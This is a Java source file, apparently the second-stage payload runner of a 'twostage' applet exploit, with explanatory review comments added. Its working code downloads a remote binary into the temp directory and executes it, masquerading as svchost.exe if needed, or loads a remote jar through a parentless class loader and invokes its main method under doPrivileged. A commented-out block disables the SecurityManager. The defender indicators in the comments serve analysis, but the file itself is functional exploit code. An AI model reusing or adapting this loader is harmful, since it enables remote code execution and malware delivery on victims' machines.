twostage/src-exploit/x/PayloadRunnerOrig.java
package x;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.security.AccessController;
import java.security.PrivilegedAction;
/**
 * Second-stage payload runner of the "twostage" exploit.
 *
 * Constructing an instance immediately executes {@link #run()} inside
 * {@link AccessController#doPrivileged(PrivilegedAction)}. The payload to run is
 * described entirely by the public static fields below, which are expected to be
 * populated by the first stage before this class is instantiated (NOTE(review):
 * inferred from the fields being static and never assigned here -- confirm against
 * the stage-one loader).
 *
 * Two payload modes are implemented:
 * <ul>
 *   <li>binary ({@code pBin != null}): the URL is fetched, written as an {@code .exe}
 *       into the JVM's temp directory and executed with {@code pArgs} as arguments;</li>
 *   <li>jar ({@code pBin == null}): the URL is handed to a {@link URLClassLoader}
 *       built reflectively from {@code clClazz} with a {@code null} parent, and
 *       {@code pClass}'s static {@code main(String[])} is invoked with {@code pArgs}.</li>
 * </ul>
 *
 * Indicators a defender can look for, all derived from the code below: a leftover
 * {@code temp*.bin} file in {@code java.io.tmpdir} (created only to locate the
 * directory and never deleted), an {@code .exe} in that directory named after the
 * payload URL's last path segment or {@code svchost.exe}, and a child process
 * spawned by the Java process. Stack traces for any failure go to stderr.
 */
public class PayloadRunnerOrig implements PrivilegedAction<Void> {
/** Base URL (typically the hosting page); only its directory part is used to resolve relative payload locations. "demomode" selects a file: URL under the working directory. */
public static String docBase = null;
/** Jar payload location, absolute URL or relative to {@link #docBase}. Ignored when {@link #pBin} is set. */
public static String pJar = null;
/** Fully qualified class whose static main(String[]) is invoked in jar mode. */
public static String pClass = null;
/** Arguments passed to the payload: argv of the executable in binary mode, main's argument in jar mode. Must be non-null in both modes (dereferenced without a check). */
public static String[] pArgs = null;
/** Binary payload location, absolute URL or relative to {@link #docBase}. Non-null selects binary mode. */
public static String pBin = null;
/** Class used to build the payload class loader; must be URLClassLoader or a subclass exposing a (URL[], ClassLoader) constructor, or the cast/reflection in run() fails. */
public static Class<?> clClazz;
/**
 * Runs the payload as a privileged action from the constructor, so merely
 * instantiating this class triggers execution. NOTE(review): presumably done so the
 * action carries this class's own protection domain rather than the applet
 * caller's -- confirm how the first stage defines/loads this class.
 */
public PayloadRunnerOrig() {
AccessController.doPrivileged(this);
}
@SuppressWarnings("all")
@Override
public Void run() {
// Dead, commented-out "default handler" kept from an earlier revision: it would
// have disabled the SecurityManager when no jar payload was configured.
// if( pJar == null ) {
// // Default handler
// try {
// System.setSecurityManager(null);
//// System.out.println("HAXOORD! SECURITY DISABLED!");
// } catch( Exception e ) {
//// System.out.println("Failed! Security still enabled.");
// }
// return null;
// }
// Load payload privileged and execute main function.
try {
// Demo mode: resolve payloads relative to ./html/index.html under the working directory.
if( "demomode".equals(docBase) ) {
docBase = "file:/"+System.getProperty("user.dir").replace('\\', '/')+"/html/index.html";
}
// Keep only the directory part (up to and including the last '/'); throws NPE if docBase is null.
docBase = docBase.substring(0,docBase.lastIndexOf("/")+1);
URL url = null;
// pBin takes precedence over pJar.
boolean binaryPayload = pBin != null;
String payloadLoc = binaryPayload ? pBin
: pJar;
// A leading scheme ("http:", "file:", ...) means an absolute URL; anything else is relative to docBase.
if( payloadLoc.matches("[a-z]+:.*") ) {
url = new URL(payloadLoc);
} else {
url = new URL(docBase+payloadLoc);
}
// System.out.println(url);
byte[] bytes = new byte[16384];
if( binaryPayload ) {
// --- binary mode: download to the temp directory and exec ---
URLConnection con = url.openConnection();
InputStream in = con.getInputStream();
int bytesRead;
File downloadLoc = null;
// Created only to discover java.io.tmpdir; this temp*.bin file is never deleted.
File f = File.createTempFile("temp", ".bin");
File tempDir = f.getParentFile();
// Drop name = last path segment of the payload location, minus any query string.
String filename = payloadLoc.substring(payloadLoc.lastIndexOf('/')+1);
if( filename.contains("?") ) {
filename = filename.substring(0,filename.indexOf("?"));
}
// If the location ends in '/', filename is empty and downloadLoc stays null,
// so the FileOutputStream below throws NPE and the payload is not run.
if( filename.length() != 0 ) {
if( !filename.endsWith(".exe") ) {
filename = filename+".exe";
}
downloadLoc = new File(tempDir+"/"+filename);
// Fallback chain when the file exists and cannot be removed: masquerade as
// svchost.exe, then a random temp name. File.createTempFile requires a prefix of
// at least three characters, so the last fallback throws IllegalArgumentException.
if( downloadLoc.exists() && !downloadLoc.delete() ) {
downloadLoc = new File(tempDir+"/svchost.exe");
if( downloadLoc.exists() && !downloadLoc.delete() ) {
downloadLoc = File.createTempFile("", ".exe");
}
}
}
// Streams are not closed on an exception path (no finally/try-with-resources).
FileOutputStream fout = new FileOutputStream(downloadLoc);
while( (bytesRead = in.read(bytes)) != -1 ) {
fout.write(bytes, 0, bytesRead);
}
in.close();
fout.close();
// argv[0] = dropped file, followed by pArgs; exec(String[]) spawns it directly, no shell.
String[] command = new String[pArgs.length+1];
command[0] = downloadLoc.getAbsolutePath();
System.arraycopy(pArgs, 0, command, 1, pArgs.length);
Runtime.getRuntime().exec(command);
} else {
// --- jar mode: load the payload class through a fresh loader and call main ---
// The loader is instantiated via reflection on clClazz with a null parent
// (bootstrap loader only), so the applet's own class loader is not consulted.
// NOTE(review): why the loader class is obtained indirectly rather than via
// `new URLClassLoader(...)` is not visible here -- presumably part of the
// sandbox bypass; confirm against the first stage.
URLClassLoader cl = (URLClassLoader) clClazz.
getConstructor(new Class[] { URL[].class, ClassLoader.class }).
newInstance(new URL[] { url },null);
Class c = cl.loadClass(pClass);
Method m = c.getMethod("main", new Class[] { String[].class });
// Static invocation; pArgs is passed as the single String[] parameter.
m.invoke(null, (Object)pArgs);
}
//System.out.println("Payload executed!");
} catch (Exception e) {
// System.out.println("Failed! Could not load payload.");
// Any failure (network, I/O, reflection, NPE from unset fields) is printed to stderr and swallowed.
e.printStackTrace();
}
return null;
}
}